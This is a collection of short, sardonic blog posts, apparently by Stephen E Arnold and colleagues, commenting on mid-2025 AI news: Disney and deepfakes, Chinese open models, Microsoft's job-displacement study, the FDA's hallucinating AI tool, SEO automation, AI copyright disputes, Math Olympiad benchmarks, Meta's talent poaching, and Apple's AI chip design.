Another Twist: AI Puts Mickey Mouse in a Trap
August 5, 2025
No AI. Just a dinobaby being a dinobaby.
The in-the-news Wall Street Journal reveals that Walt Disney and Mickey Mouse may have their tails in a modernized, painful artificial intelligence trap. “Is It Still Disney Magic If It’s AI?” asks an obvious question. My knee jerk reaction after reading the article was, “Nope.”
The write up9 reports:
A deepfake Dwayne Johnson is just one part of a broader technological earthquake hitting Hollywood. Studios are scrambling to figure out simultaneously how to use AI in the filmmaking process and how to protect themselves against it. While executives see a future where the technology shaves tens of millions of dollars off a movie’s budget, they are grappling with a present filled with legal uncertainty, fan backlash and a wariness toward embracing tools that some in Silicon Valley view as their next-century replacement.
A deepfake Dwayne is a short step from deepfake of the entire Disney menagerie. Imagine what happens if a bad actor puts Snow White in some compromising situations, posts the video on a torrent, and publicizes the service on a Telegram-type communications system. That could be interesting. Imagine Goofy at the YMCA with synthetic village people.
How does Disney manage? The write up says:
Some Epic [a Disney “partner”] executives have complained about the slow pace of the decision-making at Disney, with signoffs needed from so many different divisions, said people familiar with the situation.
Slow worked before AI felt the whips of the funders who want payoffs. Now speed thrills. Dopey and Sleepy are not likely to make substantive contributions to Disney’s AI efforts. Has the magic been revealed or just appropriated by AI developers?
Here’s another question that might befuddle Immanuel Kant:
Some Disney executives have raised concerns ahead of the project’s launch, anticipated for fall 2026 at the earliest, about who owns fan creations based on Disney characters, said one of the people. For example, if a Fortnite gamer creates a Darth Vader and Spider-Man dance that goes viral on YouTube, who owns that dance?
From my tiny office in rural Kentucky, Disney is behind the eight ball. Like Apple and Telegram, smart software presents a reasonable problem for 23 year old programmers. For those older, AI is disjunctive. Right, Dopey? Prince AI is busy elsewhere.
Stephen E Arnold, August 5, 2025
China Smart, US Dumb: Is There Any Doubt?
August 1, 2025
This blog post is the work of an authentic dinobaby. Sorry. No smart software can help this reptilian thinker.
I have been identifying some of the “China smart, US dumb” information that I see. I noticed a write up from The Register titled “China Proves That Open Models Are More Effective Than All the GPUs in the World.” My Google-style Red Alert buzzer buzzed and the bubble gum machine lights flashed.
There is was. The “all.” A categorical affirmative. China is doing something that is more than “all the GPUs in the world.” Not only that “open models are more effective” too. I have to hit the off button.
The point of the write up for me is that OpenAI is a loser. I noted this statement:
OpenAI was supposed to make good on its name and release its first open-weights model since GPT-2 this week. Unfortunately, what could have been the US’s first half-decent open model of the year has been held up by a safety review…
But it is not just OpenAI muffing the bunny. The write up points out:
the best open model America has managed so far this year is Meta’s Llama 4, which enjoyed a less than stellar reception and was marred with controversy. Just this week, it was reported that Meta had apparently taken its two-trillion-parameter Behemoth out behind the barn after it failed to live up to expectations.
Do you want to say, “Losers”? Go ahead.
But what outfit is pushing out innovative smart software as open source? Okay, you can shout, “China. The Middle Kingdom. The rightful rulers of the Pacific Rim and Southeast Asia.
That’s the “right” answer if you accept the “all” type of reasoning in the write up.
China has tallied a number of open source wins; specifically, Deepseek, Qwen, M1, Ernie, and the big winner Kimi.
Do you still have doubts about China’s AI prowess? Something is definitely wrong with you, pilgrim.
Several observations:
- The write up is a very good example of the China smart, US dumb messaging which has made its way from the South China Morning Post to YouTube and now to the Register. One has to say, “Good work to the Chinese strategists.”
- The push for open source is interesting. I am not 100 percent convinced that making these models available is intended to benefit non-Middle Kingdom people. I think that the push, like the shift to crypto currency in non traditional finance, is part of an effort to undermine what might be called “America’s hegemony.”
- The obviousness of overt criticism of OpenAI and Meta (Facebook) illustrates a growing confidence in China that Western European information channels can be exploited.
Does this matter? I think it does. Open source software has some issues. These include its use as a vector for malware. Developers often abandon projects, leaving users high and dry with some reaching for their wallet to buy commercial solutions. Open source projects for smart software may have baked in biases and functions that are not easily spotted. Many people are aware of NSO Group’s ability to penetrate communications on a device by device basis. What happens if the phone home ability is baked into some open source software.
Remember that “all.” The logical fallacy illustrates that some additional thinking may be necessary when it comes to embedding and using software from some countries with very big ambitions. What is China proving? Could it be China smart, US dumb?
Stephen E Arnold, August 1, 2025
Microsoft and Job Loss Categories: AI Replaces Humans for Sure
July 31, 2025
This blog post is the work of an authentic dinobaby. Sorry. No smart software can help this reptilian thinker.
I read “Working with AI: Measuring the Occupational Implications of Generative AI.” This is quite a sporty academic-type write up. The people cranking out this 41 page Sociology 305 term paper work at Microsoft (for now).
The main point of the 41-page research summary is:
Lots of people will lose their jobs to AI.
Now this might be a surprise to many people, but I think the consensus among bean counters is that humans cost too much and require too much valuable senior manager time to manage correctly. Load up the AI, train the software, and create some workflows. Good enough and the cost savings are obvious even to those who failed their CPA examination.
The paper is chock full of jargon, explanations of the methodology which makes the project so darned important, and a wonky approach to presenting the findings.
Remember:
Lots of people will lose their jobs to AI.
The highlight of the paper in my opinion is the “list” of occupations likely to find that AI displaces humans at a healthy pace. The list is on page 12 of the report. I snapped an image of this chart “Top 40 Occupations with Highest AI Applicability Score.” The jargon means:
Lots of people will lose their jobs to AI.
Here’s the chart. (Yes, I know you cannot read it. Just navigate to the original document and read the list. I am not retyping 40 job categories. Also, I am not going to explain the MSFT “mean action score.” You can look at that capstone to academic wizardry yourself.)
What are the top 10 jobs likely to result in big time job losses? Microsoft says they are:
- People who translate from one language to another
- Historians which I think means “history teachers” and writers of non-fiction books about the past
- Passenger attendants (think robots who bring you a for-fee vanilla cookie and an over-priced Coke with “real cane sugar”)
- People who sell services (yikes, that’s every consulting firm in the world. MBAs, be afraid)
- Writers (this category appears a number of times in the list of 40, but the “mean action score” knows best)
- Customer support people (companies want customers to never call. AI is the way to achieve this goal)
- CNC tool programmers (really? Someone has to write the code for the nifty Chip Foose wheel once I think. After that, who needs the programmer?)
- Telephone operators (there are still telephone operators. Maybe the “mean action score” system means receptionists at the urology doctors’ office?)
- Ticket agents (No big surprise)
- Broadcast announcers (no more Don Wilsons or Ken Carpenters. Sad.)
The 30 are equally eclectic and repetitive. I think you get the idea. Service jobs and work that is repetitive — Dinosaurs waiting to die.
Microsoft knows how to brighten the day for recent college graduates, people under 35, and those who are unemployed.
Oh, well, there is the Copilot system to speed information access about job hunting and how to keep a positive attitude. Thanks, Microsoft.
Stephen E Arnold, July 31, 2025
No Big Deal. It Is Just Life or Death. Meh.
July 31, 2025
This blog post is the work of an authentic dinobaby. Sorry. No smart software can help this reptilian thinker.
I am not sure about information from old-fashioned television channels is rock solid, but today what information is? I read “FDA’s Artificial Intelligence Is Supposed to Revolutionize Drug Approvals. It’s Making Up Nonexistent Studies.” Heads up. You may have to pay to read the full write up.
The main idea in the report struck me as:
[Elsa, an AI system deployed by the US Food and Drug Administration] has also made up nonexistent studies, known as AI “hallucinating,” or misrepresented research, according to three current FDA employees and documents seen by CNN. This makes it unreliable for their most critical work, the employees said.
To be fair, some researchers make up data and fiddle with “real” images for some peer reviewed research papers. It makes sense that smart software trained on “publicly available” data would possibly learn that making up information is standard operating procedure.
The cited article does not provide the names and backgrounds of the individuals who provided the information about this smart software. That’s not unusual today.
I did not this anonymous quote:
“Anything that you don’t have time to double-check is unreliable. It hallucinates confidently,” said one employee — a far cry from what has been publicly promised. “AI is supposed to save our time, but I guarantee you that I waste a lot of extra time just due to the heightened vigilance that I have to have” to check for fake or misrepresented studies, a second FDA employee said.
Is this a major problem? Many smart people are working to make AI the next big thing. I have confidence that prudence, accuracy, public safety, and AI user well-being is a priority. Yep, that’s my assumption.
I wish to offer several observations:
- Smart software may need some fine tuning before it becomes the arbiter of certain types of medical treatments, procedures, and compounds.
- AI is definitely free from the annoying hassles of sick leave, health care, and recalcitrance that human employees evidence. Therefore, AI has major benefits by definition.
- Hallucinations are a matter of opinion; for example, humans are creative. Hallucinating software may be demonstrating creativity. Creativity is a net positive; therefore, why worry?
The cited news report stated:
Those who have used it say they have noticed serious problems. For example, it cannot reliably represent studies.
As I said, “Why worry?” Humans make drug errors as well. Example: immunomodulatory drugs like thalidomide. AI may be able to repurpose dome drugs. Net gain. Why worry?
Stephen E Arnold, July 31, 20205
SEO Plus AI: Putting a Stake in the Frail Heart of Relevance
July 30, 2025
This blog post is the work of an authentic dinobaby. Sorry. No smart software can help this reptilian thinker.
I have not been too impressed with the search engine optimization service sector. My personal view is that relevance has been undermined. Gamesmanship, outright trickery, and fabrication have replaced content based on verifiable facts, data, and old-fashioned ethical and moral precepts.
Who needs that baloney? Not the SEO sector. The idea is to take content and slam it in the face of a user who may be looking for information relevant to a question, problem, or issue.
I read “Altezza Introduces Service as Software Platform for AI-Powered Search Optimization.” The name Altezza reminded me of a product called Bartesian. This outfit sell a machine that automatically makes alcohol-based drinks. Alcohol, some researchers suggest, is a bit of a problem for humanoids. Altezza may be doing to relevance what three watermelon margaritas do to a college student’s mental functions.
The article about Altezza says:
Altezza’s platform turns essential SEO tasks into scalable services that enterprise eCommerce brands can access without the burden of manual implementation.
Great AI-generated content pushed into a software script and “published” in a variety of ways in different channels. Altezza’s secret sauce may be revealed in this statement:
While conventional tools provide access to data and features, they leave implementation to overwhelmed internal teams.
Yep, let those young content marketers punch the buttons on a Bartesian device and scroll TikTok-type content. Altezza does the hard work: SEO based on AI and automated distribution and publishing.
Altezza is no spring chicken. The company was found in 1998 and “combines cutting-edge AI technology with deep search expertise to help brands achieve sustainable organic growth.”
Yep, another relevance destroying drone based smart system is available.
Stephen E Arnold, July 30, 2025
AI: Pirate or Robin Hood?
July 30, 2025
One of the most notorious things about the Internet is pirating creative properties. The biggest victim is the movie industry followed closely by publishing. Creative works that people spend endless hours making are freely distributed without proper payment to the creators and related staff. It sounds like a Robin Hood scenario, but creative folks are the ones suffering. Best selling author David Baldacci ripped into Big Tech for training their AI on stolen creative properties and he demanded that the federal government step in to rein them in.
LSE says that only a small amount of AI developers support using free and pirated data for trading models: “Most AI Researchers Reject Free Use Of Public Data To Train AI Models.” Data from UCL shows AI developers want there to be ethical standards for training data and many are in favor of asking permission from content creators. The current UK government places the responsibility on content creators to “opt out” of their work being used for AI models. Anyone with a brain knows that the AI developers skirt around those regulations.
When LSE polled people about who should protecting content creators and regulating AI, their opinions were split between the usual suspects: tech companies, governments, independent people, and international standards bodies.
Let’s see what creative genius Paul McCartney said:
While there are gaps between researchers’ and the views of authors, it would be a mistake to see these only as gaps in understanding. Song writer and surviving Beatle Paul McCartney’s comments to the BBC are a case in point: “I think AI is great, and it can do lots of great things,” McCartney told Laura Kuensberg, but it shouldn’t rip creative people off. It’s clear that McCartney gets the opportunities AI offers. For instance, he used AI to help bring to life the voice of former bandmate John Lennon in a recent single. But like the writers protesting outside of Meta’s office, he has a clear take on what AI is doing wrong and who should be responsible. These views and the views of over members of the public should be taken seriously, rather than viewed as misconceptions that will improve with education or the further development of technologies.
Authors want protection. Publishers want money. AI companies want to do exactly what they want. This is a three intellectual body problem with no easy solution.
Whitney Grace, July 30, 2025
An Author Who Will Not Be Hired by an AI Outfit. Period.
July 29, 2025
This blog post is the work of an authentic dinobaby. Sorry. No smart software can help this reptilian thinker.
I read an article / essay titled in English “The Bewildering Phenomenon of Declining Quality.” I found the examples in the article interesting. A couple like the poke at “fast fashion” have become tropes. Others, like the comments about customer service today, were insightful. Here’s an example of comment I noted:
José Francisco Rodríguez, president of the Spanish Association of Customer Relations Experts, admits that a lack of digital skills can be particularly frustrating for older adults, who perceive that the quality of customer service has deteriorated due to automation. However, Rodríguez argues that, generally speaking, automation does improve customer service. Furthermore, he strongly rejects the idea that companies are seeking to cut costs with this technology: “Artificial intelligence does not save money or personnel,” he states. “The initial investment in technology is extremely high, and the benefits remain practically the same. We have not detected any job losses in the sector either.”
I know that the motivation for dumping humans in customer support comes from [a] the extra work required to manage humans, [b] the escalating costs of health care and other “benefits”; and [c] black hole of costs that burn cash because customers want help, returns, and special treatment. Software robots are the answer.
The write up’s comments about smart software are also interesting. Here’s an example of a passage I circled:
A 2020 analysis by Fakespot of 720 million Amazon reviews revealed that approximately 42% were unreliable or fake. This means that almost half of the reviews we consult before purchasing a product online may have been generated by robots, whose purpose is to either encourage or discourage purchases, depending on who programmed them. Artificial intelligence itself could deteriorate if no action is taken. In 2024, bot activity accounted for almost half of internet traffic. This poses a serious problem: language models are trained with data pulled from the web. When these models begin to be fed with information they themselves have generated, it leads to a so-called “model collapse.”
What surprised me is the problem, specifically:
a truly good product contributes something useful to society. It’s linked to ethics, effort, and commitment.
One question: How does one inculcate these words into societal behavior?
One possible answer: Skynet.
Stephen E Arnold, July 29, 2025
AI, Math, and Cognitive Dissonance
July 28, 2025
This blog post is the work of an authentic dinobaby. Sorry. No smart software can help this reptilian thinker.
AI marketers will have to spend some time positioning their smart software as great tools for solving mathematical problems. “Not Even Bronze: Evaluating LLMs on 2025 International Math Olympiad” reports that words about prowess are disconnected from performance. The write up says:
The best-performing model is Gemini 2.5 Pro, achieving a score of 31% (13 points), which is well below the 19/42 score necessary for a bronze medal. Other models lagged significantly behind, with Grok-4 and Deepseek-R1 in particular underperforming relative to their earlier results on other MathArena benchmarks.
The write up points out, possibly to call attention to the slight disconnect between the marketing of Google AI and its performance in this contest:
As mentioned above, Gemini 2.5 Pro achieved the highest score with an average of 31% (13 points). While this may seem low, especially considering the $400 spent on generating just 24 answers, it nonetheless represents a strong performance given the extreme difficulty of the IMO. However, these 13 points are not enough for a bronze medal (19/42). In contrast, other models trail significantly behind and we can already safely say that none of them will achieve the bronze medal. Full results are available on our leaderboard, where everyone can explore and analyze individual responses and judge feedback in detail.
This is one “competition”, the lousy performance of the high-profile models, and the complex process required to assess performance make it easy to ignore this result.
Let’s just assume that it is close enough for horse shoes and good enough. With that assumption in mind, do you want smart software making decisions about what information you can access, the medical prognosis for your nine-year-old child, or decisions about your driver’s license renewal?
Now, let’s consider this write up fragmented across Tweets: [Thread] An OpenAI researcher says the company’s latest experimental reasoning LLM achieved gold medal-level performance on the 2025 International Math Olympiad. The little posts are perfect for a person familliar with TikTok-type and Twitter-like content. Not me. The main idea is that in the same competition, OpenAI earned “gold medal-level performance.”
The $64 dollar question is, “Who is correct?” The answer is, “It depends.”
Is this an example of what I learned in 1962 in my freshman year at a so-so university? I think the term was cognitive dissonance.
Stephen E Arnold, July 28, 2025
Silicon Valley: The New Home of Unsportsmanlike Conduct
July 26, 2025
Sorry, no smart software involved. A dinobaby’s own emergent thoughts.
I read the Axios run down of Mark Zuckerberg’s hiring blitz. “Mark Zuckerberg Details Meta’s Superintelligence Plans” reports:
The company [Mark Zuckerberg’s very own Meta] is spending billions of dollars to hire key employees as it looks to jumpstart its effort and compete with Google, OpenAI and others.
Meta (formerly the estimable juicy brand Facebook) had some smart software people. (Does anyone remember Jerome Pesenti?) Then there was Llama, and like the guanaco, tamed and used to carry tourists to Peruvian sights, has been seen as a photo opp for parents wanting to document their kids’ visit to Cusco.
Is Mr. Zuckerberg creating a mini Bell Labs in order to take the lead in smart software?The Axios write up contains some names of people who may have some connection to the Middle Kingdom. The idea is to get smart people, put them in a two-story building in Silicon Valley, turn up the A/C, and inject snacks.
I interpret the hiring and the allegedly massive pay packets to a simpler, more direct idea: Move fast, break things.
What are the things Mr. Zuckerberg is breaking?
First, I worked in Silicon Valley (aka Plastic Fantastic) for a number of years. I lived in Berkely and loved that commute to San Mateo, Foster City, and environs. Poaching employees was done in a more relaxed way. A chat at a conference, a small gathering after a softball game at the public fields not far from Stanford (yes, the school which had a president who made up information), or at some event like a talk at the Computer Museum or whatever it was called. That’s history. Mr. Zuckerberg shows up (virtually or in a T shirt), offers an alleged $100 million and hires a big name. No muss. No fuss. No social conventions. Just money. Cash. (I almost wish I was 25 and working in Mountain View. Sigh.)
Second, Mr. Zuckerberg is targeting the sensitive private parts of big leadership people. No dancing. Just targeted castration of key talent. Ouch. The Axios write up provides the names of some of these individuals. What interesting is that these people come from the knowledge parts hidden from the journalistic spotlight. Those suffering life changing removals without anesthesia include Google, OpenAI, and similar firms. In the good old days, Silicon Valley firms competed less of that Manhattan, lower east side vibe. No more.
Third, Mr. Zuckerberg is not announcing anything at conferences or with friendly emails. He is just taking action. Let the people at Apple, Safe Superintelligence, and similar outfits read the news in a resignation email. Mr. Zuckerberg knows that those NDAs and employment contracts can be used to wipe away tears when the loss of a valuable person is discovered.
What’s up?
Obviously Mr. Zuckerberg is not happy that his outfit is perceived as a loser in the AI game. Will this Bell Labs’ West approach work? Probably not. It will deliver one thing, however. Mr. Zuckerberg is sending a message that he will spend money to cripple, hobble, and derail AI innovation at firms beating his former LLM to death.
Move fast and break things has come to the folks who used the approach to take out swaths of established businesses. Now the technique is being used on companies next door. Welcome to the ungentrified neighborhood. Oh, expect more fist fights at those once friendly, co-ed softball games.
Stephen E Arnold, July 26, 2025
Will Apple Do AI in China? Subsidies, Investment, Saluting Too
July 25, 2025
This blog post is the work of an authentic dinobaby. Sorry. No smart software can help this reptilian thinker.
Apple long ago vowed to use the latest tech to design its hardware. Now that means generative AI. Asia Financial reports, “Apple Keen to Use AI to Design Its Chips, Tech Executive Says.” That tidbit comes from a speech Apple VP Johny Srouji made as he accepted an award from tech R&D group Imec. We learn:
“In the speech, a recording of which was reviewed by Reuters, Srouji outlined Apple’s development of custom chips from the first A4 chip in an iPhone in 2010 to the most recent chips that power Mac desktop computers and the Vision Pro headset. He said one of the key lessons Apple learned was that it needed to use the most cutting-edge tools available to design its chips, including the latest chip design software from electronic design automation (EDA) firms. The two biggest players in that industry – Cadence Design Systems and Synopsys – have been racing to add artificial intelligence to their offerings. ‘EDA companies are super critical in supporting our chip design complexities,’ Srouji said in his remarks. ‘Generative AI techniques have a high potential in getting more design work in less time, and it can be a huge productivity boost.’”
Srouji also noted Apple is one to commit to its choices. The post notes:
“Srouji said another key lesson Apple learned in designing its own chips was to make big bets and not look back. When Apple transitioned its Mac computers – its oldest active product line – from Intel chips to its own chips in 2020, it made no contingency plans in case the switch did not work.”
Yes, that gamble paid off for the polished tech giant. Will this bet be equally advantageous?
Has Apple read “Apple in China”?
Cynthia Murrell, July 25, 2025

